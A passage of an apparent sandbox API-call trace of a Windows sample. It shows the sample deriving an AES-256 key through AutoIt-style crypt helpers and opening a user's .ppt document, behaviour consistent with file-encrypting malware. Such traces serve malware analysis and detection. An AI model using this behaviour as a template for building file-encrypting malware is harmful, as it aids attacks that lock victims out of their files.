lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615d42b0, ftCreationTime.dwHighDateTime=0x1d5c5fc, ftLastAccessTime.dwLowDateTime=0xb484a880, ftLastAccessTime.dwHighDateTime=0x1d5bad9, ftLastWriteTime.dwLowDateTime=0xb484a880, ftLastWriteTime.dwHighDateTime=0x1d5bad9, nFileSizeHigh=0x0, nFileSizeLow=0x106e8, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="146Rtg30PAl-LzIM9L_.ppt", cAlternateFileName="146RTG~1.PPT")) returned 0x7c2240 [0035.456] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.456] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.456] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.456] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.456] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.456] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.456] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.456] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.456] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.456] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.456] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.456] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.456] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.456] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.456] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.457] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.457] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0035.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.457] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0035.457] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.458] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.458] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.458] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.458] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.458] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.458] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.458] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.458] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.458] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.458] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.458] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.458] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.458] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.458] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.458] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.458] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.458] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.458] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.458] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.458] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.458] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.458] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.459] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.459] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.459] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.459] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.459] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.459] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.459] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.459] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.459] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.459] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.459] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.459] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.459] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.459] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.459] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.459] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.459] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.459] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.460] CryptHashData (hHash=0x7c2100, pbData=0x7c9798, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.460] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.460] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.460] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.460] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.460] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.460] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0035.460] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.461] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.461] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.461] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.461] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.461] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0035.461] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0035.461] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.461] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.461] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0035.461] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.462] CryptDestroyHash (hHash=0x7c2100) returned 1 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.462] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.462] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0035.462] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.462] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.462] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0035.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\146rtg30pal-lzim9l_.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.463] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.463] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.463] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0035.463] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.463] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 